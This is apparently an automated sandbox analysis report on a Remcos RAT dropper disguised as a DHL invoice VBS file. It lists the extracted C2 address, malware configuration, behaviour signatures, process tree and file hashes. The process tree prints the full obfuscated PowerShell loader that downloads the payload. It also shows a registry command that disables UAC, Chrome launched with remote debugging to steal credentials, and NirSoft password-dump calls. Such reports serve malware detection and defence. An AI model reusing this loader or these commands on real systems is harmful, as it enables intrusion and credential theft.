Analysis

  • max time kernel
    149s
  • max time network
    137s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    25-11-2024 06:11

General

  • Target

    URGENT!! DHL invoice SG00101637 Adobe·pdf.vbs

  • Size

    15KB

  • MD5

    84183b62bf0c860efeaea9604efbfe3a

  • SHA1

    4cc58ad007613902ff2118cb7091042f37ba394f

  • SHA256

    b4eff9a95f5eeeaee8c4e4a8ce366f478acf9f309e1df6db8a93375045982c5a

  • SHA512

    916c80269eec78f3391e67819a3fa9a4a64a52a2e7909c5a2a3f310211e1aba01534a932f6df06df8d70ec0ea7d641c7e5b9b5e527045a6f27b65a128f19a81b

  • SSDEEP

    384:WxaWEl8MDBPMpf/X1tBoCPSn5otbq+4Xs4kDyLuoWt:gEl8MDBPy3X7BoBCtbq+4XspDyHWt

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

gnsuw4-nsh6-mnsg.duckdns.org:3613

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-8OIXMO

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • UAC bypass 3 TTPs 1 IoCs
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 13 IoCs
  • Uses browser remote debugging 2 TTPs 4 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 48 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\URGENT!! DHL invoice SG00101637 Adobe·pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2532
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Betagenndfres='Gingalls';;$Uroptysis='Frdigpakkes';;$Bagageboksen='Punt';;$arbejdsredskabs='Oprykningsprve';;$Disenrol102='Bodsvelsernes';;$Kommunikationsparametres=$host.Name;function Datalogiers($Magnetogasdynamics){If ($Kommunikationsparametres) {$Gratify=4} for ($Betagen=$Gratify;;$Betagen+=5){if(!$Magnetogasdynamics[$Betagen]) { break }$Mesothet+=$Magnetogasdynamics[$Betagen]}$Mesothet}function Gasbordenes($Ceasmic){ .($Pjankeriernes227) ($Ceasmic)}$Overmttedes=Datalogiers ' Tren Cate C,mtUnbu.Enz,wO.slESp,sb hisc Myrl NonIBonaEUdpun SilT';$Rotvlsket=Datalogiers 'TypoMAlleoadelzCorriPrizl.andlUdf.aAugm/';$Brnecykels=Datalogiers 'SideTDat l nats Ind1Srsk2';$Unhealthily='Besl[BenknP rpeRoueTUroc. HorS RabE ColrStomVNondiDiagC,ljfEPlatpFamiOKre,ivestNTo,ltPa.imReglaAn pNForsADespGGeorEReglRDisu] orp:Stem: linSWickES.viC spaUDeccRFrazITan tVen.yHu kpUncoRTussORabit OveOUdfoc Ut O ypl Re =Pieb$FandBDee rKissN VireAns c Dray,ondKCushEKursl Fais';$Rotvlsket+=Datalogiers 'Grie5 Sty.Pede0,nkl Prve( ForWot diUnpenProld Shoo DemwHypesSulf StrNPodeTKobr Jefe1 Afg0Outc.Seed0Tone;taxe LydtWQuetiunsanGrye6 et4 eho;Ange Sucx ook6Unde4Pilp;Dags CarrBrinv,irr:Doku1P ri3Girt1F sk. Krs0egne)Klvn SpriGCenteIndbcSupekBefroSelv/E ec2Lu n0 Kha1Touc0Blok0 Dag1 Und0Mega1co c DyspFb roiUnagrRehoeHjesf DoloKo mxGoti/ Dod1 Ska3Fles1Mish.Tusc0';$physitism=Datalogiers 'Li,nU emasHet EOprrR ns-K.ntA,aregRov E ExtnTraut';$erstatningskrav=Datalogiers 'QueshSkottBa etsandpkernsSpin: emt/Sk,r/sam dcyl,rBrygiBrakvR seeBant.Ge,igStedoE oroEukagLnovlSurmeBa n.SomacCa bo ormmStov/SalvuFin.c azz?Trope RusxGr tpOpdaoStilr,agtt Fin= OredVen o ondwtronnSmrolU.deoMotha tedTegn&M skiP udd on=Reve1UnmoxH wki ycmKl.sxR peKPorik PerHGl.t9InsiMKru 5PlurzDo.hWUninV RemmMetarCotyRT rt6UnfrTBioru,atePHjemBBumbQSens8 esqLigksSe t_K.edJSka,5StvnaHrentNaerrSh pB';$Vasers=Datalogiers 'Star>';$Pjankeriernes227=Datalogiers 'Ba lIclo,eVoltx';$fjernkendinger='Beyer';$Formants218='\Dechemicalize.Opk';Gasbordenes (Datalogiers 'Bagt$Integ VarL HeroBuslb AntA EtalDhud:.ostMPr,mE LdrSFus.IStamO ubrvEli Efan.RPellSKogeILrerOSch n Tet=Rind$DataEB trnTenovDayb:UdfrAGe nPArb P TraD DraAEriktBetrAFagi+Inhu$Demof IngoVelar SlamCa.fa ZoiNUaf,TUnensScol2Om u1Unap8');Gasbordenes (Datalogiers ' Gro$Forgg.athlInkvo amobSa,iaDisoLresc: HjeyRa,rES.lfn Re =Subf$BambE SpirC nvsUndetEx gaInb tHnsen heaiFrignDrilGRa.kSFor KO unrMoo A isVAnsi.Unq.s .noPInd,l FenI ,akt,agu(Te m$a faV H.mA HagS SkaEdrmnRLudisCata)');Gasbordenes (Datalogiers $Unhealthily);$erstatningskrav=$Yen[0];$Prezygapophysis=(Datalogiers 'eneu$Re.ogRedelZenioInblbKirjAP pnLNecr:DanscUnupL SeqiVel,a E.hc allKKr g=BanenLi seKuriWDr,k- Ma o NilbCallJRe mE SupCS ortPosi UmbeS U syRaphS LnkT sedeItinmMohu.F,st$ AntOCassVPolieAforr UndMPr fTLepttSigmEba tD MumE Ca S');Gasbordenes ($Prezygapophysis);Gasbordenes (Datalogiers 'Slgt$curvCCypslVorli Aglapremc.elekKysh. DykH Mo eBshnaUndldKrypeEgi rRum,s aa[Exis$BandpLivfhS kuyFremsRil iN,nstWa giForts ,agmPaa ]Mezz=Pres$OppeRNaftoAftetBiddvTr.klMilas Ne,k Abse Goot');$Hapset=Datalogiers 'Entr$Un aCT emlS lpiOveraAarrc SaskHder.PolyDCoc oAntiwFussnSa ilTil oKlimaRecedMaveFBjeri Mu.lFermeSlow(Defa$Sig.eRe er ,ttsMethtTapea Yngt An n cabi toln Indg f lsSpdbksoutrcrita HilvOver,Tal $ DemMAdg uDanar.ertsAttrtFemaeTripn LufeKirinMi j)';$Murstenen=$Mesioversion;Gasbordenes (Datalogiers 'Undi$charg HomLTheoOVeriBRec,A Klul Leo:ReceSI meP IndHBvsee enRFinlO ilniGuardSt gi KulShardMpe,l=sna.(Mo oTsygeEUn as arctPar,-.nnuPWiseAVuggTParohB ch rs$ SvamVeneU RibrRaa SP agTPo ieove.N ddETriuNVitr)');while (!$Spheroidism) {Gasbordenes (Datalogiers 'Su,e$ R vgWilll VenoSkrubVaagaUnselKult: olvPTilslUnikuNonfm Mice OddoEndep illiPladcMadre henaPyrinrekl= F.n$ atMTraniKngtcRoa,rSammoAnprsFosseOriucDedioBlann eped') ;Gasbordenes $Hapset;Gasbordenes (Datalogiers 'GenfsAn itHushaAdgar Supt Adv-bortS ejlLTrigE PhreOmisp.edd Insi4');Gasbordenes (Datalogiers 'Unfa$S vogCortlForeOFu hb Py aUk yLPate:Smr,sMe epBla HH reETe.trU coOwee.iC,rod FlyiNonfsColuMK.ra=Bor (ethmtJoureInteSPasfTMask-su pPGldsa ArcT ukaHIdea Hydr$DusimLumpUpresR NuaSAur.T honEDu kN.rfaELaruN Pro)') ;Gasbordenes (Datalogiers 'Desi$IntegOttel SkooBramBHemeaLi nLStrm: ConSBaalaCaffLacceTcelloAn iSCait=P lb$AvanGMonoL SodO InkBCampAt.evlKy i:HastOPorpDForsoBattnA skTStroOfrimC ,ilL UndAAutoSjerst Coa+ Lte+Iris% ilt$Cracy.henEPortnBirk.MinicLeopo s.dUret.N ,ydT') ;$erstatningskrav=$Yen[$Saltos]}$Whipsaws=284270;$Udenrigsministre=30012;Gasbordenes (Datalogiers 'Cy,t$ ApogVau,lFed odenuBfaina roiL Cit:ClosFRylee DrimPotauSvl,rMori Di,=Forl EdutgSoigeS ngtOrbi-HaeccpseuoReeln KxctBeaceGasuNKarbtIndk Unin$FyldM aauArchrHaleSGi,nTOrdrE.vann elleWra n');Gasbordenes (Datalogiers 'O er$ agrg carlAnd oPausb UnnaBoldl Tid:.fstI kkenmeldn HeteAggerUnsawAbaziUntunGedegDaybeSvinrBefa Embo=tran A to[IsblSPe hyca ssAppot Zele NyomKage.Ud aCGinfo O knCap v,ithepenorAllot ene]K,nc:.orn:Ac,rFMedlrKillo B gmkva BFormastras umfeLook6 aad4GastSTilhtHeu r Be irdsenEx.egCowb(Uni.$M lofGleae ,ddm S iuMaidrEmpi)');Gasbordenes (Datalogiers 'mono$Ecb GStoaL strOlerdBS rvAplatLMdse:BiomsSvi Y,uisNtrykTFootaPokeKpressknalaEm aNBetlaCu.blStanyPub sGranaNpmuTLovgoCompr Hor Snip=Afro Rata[DokuS.askY.mmesActitFagieEntrMKopi. ManTJurie Br xvolsT Bru.CidaEVintNSemiC.angO BesD AnliMonknCo pGP,at]Augu:Unpr: AspaEk pSO ysCSobrID ibINiko.Elekg Pokefan,TGlanSMobit InfRForbi indN .legTall(jebl$viviiTyktNAnagn Mideudkrr.ejvWContI oftNDiffgFiskeCeliRQ ad)');Gasbordenes (Datalogiers 'G da$.ridg,amuL emtoTamabUngaaEurylC mb: F.ntIndii erkMTimea Fo r Hoo=Hima$ kkS .keyEnben,ligtfiskA R,jK,kjosKledATopvNKaraaArm l HarYSidesteosARingToutsOIntrrAmpl.Sen SDro UIdeoBB,ltsSt uT ,rir Sh,iDet,N BibGStla(Biot$AlloWaskehTranI En pIsoaSUdhuAHa sw atSKed ,Tvrf$Fe euSubrdBrileNrinn emaR RkeIPostG PliSmunkMLongiTil nConti ybs.fprt xycR SejeAfb )');Gasbordenes $Timar;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2552
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Betagenndfres='Gingalls';;$Uroptysis='Frdigpakkes';;$Bagageboksen='Punt';;$arbejdsredskabs='Oprykningsprve';;$Disenrol102='Bodsvelsernes';;$Kommunikationsparametres=$host.Name;function Datalogiers($Magnetogasdynamics){If ($Kommunikationsparametres) {$Gratify=4} for ($Betagen=$Gratify;;$Betagen+=5){if(!$Magnetogasdynamics[$Betagen]) { break }$Mesothet+=$Magnetogasdynamics[$Betagen]}$Mesothet}function Gasbordenes($Ceasmic){ .($Pjankeriernes227) ($Ceasmic)}$Overmttedes=Datalogiers ' Tren Cate C,mtUnbu.Enz,wO.slESp,sb hisc Myrl NonIBonaEUdpun SilT';$Rotvlsket=Datalogiers 'TypoMAlleoadelzCorriPrizl.andlUdf.aAugm/';$Brnecykels=Datalogiers 'SideTDat l nats Ind1Srsk2';$Unhealthily='Besl[BenknP rpeRoueTUroc. HorS RabE ColrStomVNondiDiagC,ljfEPlatpFamiOKre,ivestNTo,ltPa.imReglaAn pNForsADespGGeorEReglRDisu] orp:Stem: linSWickES.viC spaUDeccRFrazITan tVen.yHu kpUncoRTussORabit OveOUdfoc Ut O ypl Re =Pieb$FandBDee rKissN VireAns c Dray,ondKCushEKursl Fais';$Rotvlsket+=Datalogiers 'Grie5 Sty.Pede0,nkl Prve( ForWot diUnpenProld Shoo DemwHypesSulf StrNPodeTKobr Jefe1 Afg0Outc.Seed0Tone;taxe LydtWQuetiunsanGrye6 et4 eho;Ange Sucx ook6Unde4Pilp;Dags CarrBrinv,irr:Doku1P ri3Girt1F sk. Krs0egne)Klvn SpriGCenteIndbcSupekBefroSelv/E ec2Lu n0 Kha1Touc0Blok0 Dag1 Und0Mega1co c DyspFb roiUnagrRehoeHjesf DoloKo mxGoti/ Dod1 Ska3Fles1Mish.Tusc0';$physitism=Datalogiers 'Li,nU emasHet EOprrR ns-K.ntA,aregRov E ExtnTraut';$erstatningskrav=Datalogiers 'QueshSkottBa etsandpkernsSpin: emt/Sk,r/sam dcyl,rBrygiBrakvR seeBant.Ge,igStedoE oroEukagLnovlSurmeBa n.SomacCa bo ormmStov/SalvuFin.c azz?Trope RusxGr tpOpdaoStilr,agtt Fin= OredVen o ondwtronnSmrolU.deoMotha tedTegn&M skiP udd on=Reve1UnmoxH wki ycmKl.sxR peKPorik PerHGl.t9InsiMKru 5PlurzDo.hWUninV RemmMetarCotyRT rt6UnfrTBioru,atePHjemBBumbQSens8 esqLigksSe t_K.edJSka,5StvnaHrentNaerrSh pB';$Vasers=Datalogiers 'Star>';$Pjankeriernes227=Datalogiers 'Ba lIclo,eVoltx';$fjernkendinger='Beyer';$Formants218='\Dechemicalize.Opk';Gasbordenes (Datalogiers 'Bagt$Integ VarL HeroBuslb AntA EtalDhud:.ostMPr,mE LdrSFus.IStamO ubrvEli Efan.RPellSKogeILrerOSch n Tet=Rind$DataEB trnTenovDayb:UdfrAGe nPArb P TraD DraAEriktBetrAFagi+Inhu$Demof IngoVelar SlamCa.fa ZoiNUaf,TUnensScol2Om u1Unap8');Gasbordenes (Datalogiers ' Gro$Forgg.athlInkvo amobSa,iaDisoLresc: HjeyRa,rES.lfn Re =Subf$BambE SpirC nvsUndetEx gaInb tHnsen heaiFrignDrilGRa.kSFor KO unrMoo A isVAnsi.Unq.s .noPInd,l FenI ,akt,agu(Te m$a faV H.mA HagS SkaEdrmnRLudisCata)');Gasbordenes (Datalogiers $Unhealthily);$erstatningskrav=$Yen[0];$Prezygapophysis=(Datalogiers 'eneu$Re.ogRedelZenioInblbKirjAP pnLNecr:DanscUnupL SeqiVel,a E.hc allKKr g=BanenLi seKuriWDr,k- Ma o NilbCallJRe mE SupCS ortPosi UmbeS U syRaphS LnkT sedeItinmMohu.F,st$ AntOCassVPolieAforr UndMPr fTLepttSigmEba tD MumE Ca S');Gasbordenes ($Prezygapophysis);Gasbordenes (Datalogiers 'Slgt$curvCCypslVorli Aglapremc.elekKysh. DykH Mo eBshnaUndldKrypeEgi rRum,s aa[Exis$BandpLivfhS kuyFremsRil iN,nstWa giForts ,agmPaa ]Mezz=Pres$OppeRNaftoAftetBiddvTr.klMilas Ne,k Abse Goot');$Hapset=Datalogiers 'Entr$Un aCT emlS lpiOveraAarrc SaskHder.PolyDCoc oAntiwFussnSa ilTil oKlimaRecedMaveFBjeri Mu.lFermeSlow(Defa$Sig.eRe er ,ttsMethtTapea Yngt An n cabi toln Indg f lsSpdbksoutrcrita HilvOver,Tal $ DemMAdg uDanar.ertsAttrtFemaeTripn LufeKirinMi j)';$Murstenen=$Mesioversion;Gasbordenes (Datalogiers 'Undi$charg HomLTheoOVeriBRec,A Klul Leo:ReceSI meP IndHBvsee enRFinlO ilniGuardSt gi KulShardMpe,l=sna.(Mo oTsygeEUn as arctPar,-.nnuPWiseAVuggTParohB ch rs$ SvamVeneU RibrRaa SP agTPo ieove.N ddETriuNVitr)');while (!$Spheroidism) {Gasbordenes (Datalogiers 'Su,e$ R vgWilll VenoSkrubVaagaUnselKult: olvPTilslUnikuNonfm Mice OddoEndep illiPladcMadre henaPyrinrekl= F.n$ atMTraniKngtcRoa,rSammoAnprsFosseOriucDedioBlann eped') ;Gasbordenes $Hapset;Gasbordenes (Datalogiers 'GenfsAn itHushaAdgar Supt Adv-bortS ejlLTrigE PhreOmisp.edd Insi4');Gasbordenes (Datalogiers 'Unfa$S vogCortlForeOFu hb Py aUk yLPate:Smr,sMe epBla HH reETe.trU coOwee.iC,rod FlyiNonfsColuMK.ra=Bor (ethmtJoureInteSPasfTMask-su pPGldsa ArcT ukaHIdea Hydr$DusimLumpUpresR NuaSAur.T honEDu kN.rfaELaruN Pro)') ;Gasbordenes (Datalogiers 'Desi$IntegOttel SkooBramBHemeaLi nLStrm: ConSBaalaCaffLacceTcelloAn iSCait=P lb$AvanGMonoL SodO InkBCampAt.evlKy i:HastOPorpDForsoBattnA skTStroOfrimC ,ilL UndAAutoSjerst Coa+ Lte+Iris% ilt$Cracy.henEPortnBirk.MinicLeopo s.dUret.N ,ydT') ;$erstatningskrav=$Yen[$Saltos]}$Whipsaws=284270;$Udenrigsministre=30012;Gasbordenes (Datalogiers 'Cy,t$ ApogVau,lFed odenuBfaina roiL Cit:ClosFRylee DrimPotauSvl,rMori Di,=Forl EdutgSoigeS ngtOrbi-HaeccpseuoReeln KxctBeaceGasuNKarbtIndk Unin$FyldM aauArchrHaleSGi,nTOrdrE.vann elleWra n');Gasbordenes (Datalogiers 'O er$ agrg carlAnd oPausb UnnaBoldl Tid:.fstI kkenmeldn HeteAggerUnsawAbaziUntunGedegDaybeSvinrBefa Embo=tran A to[IsblSPe hyca ssAppot Zele NyomKage.Ud aCGinfo O knCap v,ithepenorAllot ene]K,nc:.orn:Ac,rFMedlrKillo B gmkva BFormastras umfeLook6 aad4GastSTilhtHeu r Be irdsenEx.egCowb(Uni.$M lofGleae ,ddm S iuMaidrEmpi)');Gasbordenes (Datalogiers 'mono$Ecb GStoaL strOlerdBS rvAplatLMdse:BiomsSvi Y,uisNtrykTFootaPokeKpressknalaEm aNBetlaCu.blStanyPub sGranaNpmuTLovgoCompr Hor Snip=Afro Rata[DokuS.askY.mmesActitFagieEntrMKopi. ManTJurie Br xvolsT Bru.CidaEVintNSemiC.angO BesD AnliMonknCo pGP,at]Augu:Unpr: AspaEk pSO ysCSobrID ibINiko.Elekg Pokefan,TGlanSMobit InfRForbi indN .legTall(jebl$viviiTyktNAnagn Mideudkrr.ejvWContI oftNDiffgFiskeCeliRQ ad)');Gasbordenes (Datalogiers 'G da$.ridg,amuL emtoTamabUngaaEurylC mb: F.ntIndii erkMTimea Fo r Hoo=Hima$ kkS .keyEnben,ligtfiskA R,jK,kjosKledATopvNKaraaArm l HarYSidesteosARingToutsOIntrrAmpl.Sen SDro UIdeoBB,ltsSt uT ,rir Sh,iDet,N BibGStla(Biot$AlloWaskehTranI En pIsoaSUdhuAHa sw atSKed ,Tvrf$Fe euSubrdBrileNrinn emaR RkeIPostG PliSmunkMLongiTil nConti ybs.fprt xycR SejeAfb )');Gasbordenes $Timar;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2652
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1416
      • C:\Windows\SysWOW64\cmd.exe
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1812
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          4⤵
          • UAC bypass
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:2096
      • C:\Program Files\Google\Chrome\Application\Chrome.exe
        --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
        3⤵
        • Uses browser remote debugging
        • Enumerates system info in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:2536
        • C:\Program Files\Google\Chrome\Application\Chrome.exe
          "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd4,0x7fef6369758,0x7fef6369768,0x7fef6369778
          4⤵
            PID:2400
          • C:\Program Files\Google\Chrome\Application\Chrome.exe
            "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1148 --field-trial-handle=1324,i,8274047955725261279,15764885439351178886,131072 /prefetch:2
            4⤵
              PID:1580
            • C:\Program Files\Google\Chrome\Application\Chrome.exe
              "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1484 --field-trial-handle=1324,i,8274047955725261279,15764885439351178886,131072 /prefetch:8
              4⤵
                PID:1684
              • C:\Program Files\Google\Chrome\Application\Chrome.exe
                "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1524 --field-trial-handle=1324,i,8274047955725261279,15764885439351178886,131072 /prefetch:8
                4⤵
                  PID:1628
                • C:\Program Files\Google\Chrome\Application\Chrome.exe
                  "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2036 --field-trial-handle=1324,i,8274047955725261279,15764885439351178886,131072 /prefetch:1
                  4⤵
                  • Uses browser remote debugging
                  PID:1804
                • C:\Program Files\Google\Chrome\Application\Chrome.exe
                  "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2044 --field-trial-handle=1324,i,8274047955725261279,15764885439351178886,131072 /prefetch:1
                  4⤵
                  • Uses browser remote debugging
                  PID:1440
                • C:\Program Files\Google\Chrome\Application\Chrome.exe
                  "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3416 --field-trial-handle=1324,i,8274047955725261279,15764885439351178886,131072 /prefetch:8
                  4⤵
                    PID:2308
                  • C:\Program Files\Google\Chrome\Application\Chrome.exe
                    "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=3220 --field-trial-handle=1324,i,8274047955725261279,15764885439351178886,131072 /prefetch:2
                    4⤵
                      PID:764
                    • C:\Program Files\Google\Chrome\Application\Chrome.exe
                      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=2012 --field-trial-handle=1324,i,8274047955725261279,15764885439351178886,131072 /prefetch:1
                      4⤵
                      • Uses browser remote debugging
                      PID:880
                  • C:\Windows\SysWOW64\msiexec.exe
                    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\eujs"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3056
                  • C:\Windows\SysWOW64\msiexec.exe
                    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\poolkuf"
                    3⤵
                    • Accesses Microsoft Outlook accounts
                    • System Location Discovery: System Language Discovery
                    PID:1748
                  • C:\Windows\SysWOW64\msiexec.exe
                    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\ribekeqzfhj"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2324
              • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                1⤵
                  PID:2564

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\ProgramData\remcos\logs.dat

                  Filesize

                  144B

                  MD5

                  6b9985496c79bc5a55627e69b1e9c2b7

                  SHA1

                  94e63b0da7e211e6b5679c5828403f5326d8e6cb

                  SHA256

                  c0ea3bc6cef53b1e38a27288fdf146dc237e7f9c0000efca261dab9758ec7dfa

                  SHA512

                  67df2bc9de4c9fa8b8bac71d8f56d11de8f47843f1753e3735cf68deac27315ea0fbd67429d4a80ceddf70d5777e66f2862ae83d5385f5911ddee66bea1f4239

                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199

                  Filesize

                  854B

                  MD5

                  e935bc5762068caf3e24a2683b1b8a88

                  SHA1

                  82b70eb774c0756837fe8d7acbfeec05ecbf5463

                  SHA256

                  a8accfcfeb51bd73df23b91f4d89ff1a9eb7438ef5b12e8afda1a6ff1769e89d

                  SHA512

                  bed4f6f5357b37662623f1f8afed1a3ebf3810630b2206a0292052a2e754af9dcfe34ee15c289e3d797a8f33330e47c14cbefbc702f74028557ace29bf855f9e

                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

                  Filesize

                  1KB

                  MD5

                  62ba67f0aae2af60cfc03aef3c733fb5

                  SHA1

                  6721d947295af0a5192e3e0d25c4779089ea2af2

                  SHA256

                  5033b8d2e86abfe3979878aad7fed1457aa057f0486372298b0d09cb31ff619a

                  SHA512

                  6ff101b345f416e6b75397ef08a919759fca1bfe9532fd5ac7c99659796daf74f261041385596a993c12dd1b5118e7f411604b99e76105d95670a88b16e52715

                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_841DF67C840691A847835C0F760B4DC0

                  Filesize

                  471B

                  MD5

                  c4564412e2b55aec67ffb4869de4e81b

                  SHA1

                  f04e1d6da8ac646a6165534e27876d99db2ecc5b

                  SHA256

                  a96f0ef0f56546d7078ca07e0333969fd2536208cd1abe5c3b81a8fee266c579

                  SHA512

